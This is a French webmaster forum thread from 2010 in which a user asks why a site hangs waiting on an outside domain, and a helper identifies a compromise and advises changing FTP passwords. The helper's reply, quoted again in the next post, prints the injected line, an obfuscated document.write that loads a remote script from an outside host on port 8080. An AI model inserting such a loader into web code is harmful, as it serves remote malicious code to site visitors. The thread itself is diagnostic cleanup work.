comportement étrange

Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics

ylev
WRInaute discret
WRInaute discret

comportement étrange

Message le Ven Juin 25, 2010 10:15

On me demande de vérifier un site qui est très lent.
A l'ouverture de celui-ci Chrome me dit "en attente de -dolfy.sedonahyperbarics.com-"
De plus ce site utilise un JS nommé "ascenseur" qui a priori est inactif à l'affichage. ( a voir dans les pages interieures du site)
Merci pour votre aide
PS j'ai déjà écrasé l'ancien site par le site "source" tout semble normal mais après qques heures le problème réapparait.
site : -aabal.fr-

seebz
WRInaute impliqué
WRInaute impliqué

Re: comportement étrange

Message le Ven Juin 25, 2010 10:47

j'ai avast qui s'affole, faudrait voir pour trouver la faille, changer les mdp ftp, toussa

edit : faudrait aussi enlever ça du fichier ascenceur
Code: Tout sélectionner
document.write('<s'+'cript type="text/javascript" src="http://dolfy.sedonahyperbarics.com:8080/Vector.js"></scr'+'ipt>');

ylev
WRInaute discret
WRInaute discret

Re: comportement étrange

Message le Ven Juin 25, 2010 14:21

seebz a écrit:j'ai avast qui s'affole, faudrait voir pour trouver la faille, changer les mdp ftp, toussa

edit : faudrait aussi enlever ça du fichier ascenceur
Code: Tout sélectionner
document.write('<s'+'cript type="text/javascript" src="http://dolfy.sedonahyperbarics.com:8080/Vector.js"></scr'+'ipt>');

Ok je vais essayer, merci

Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :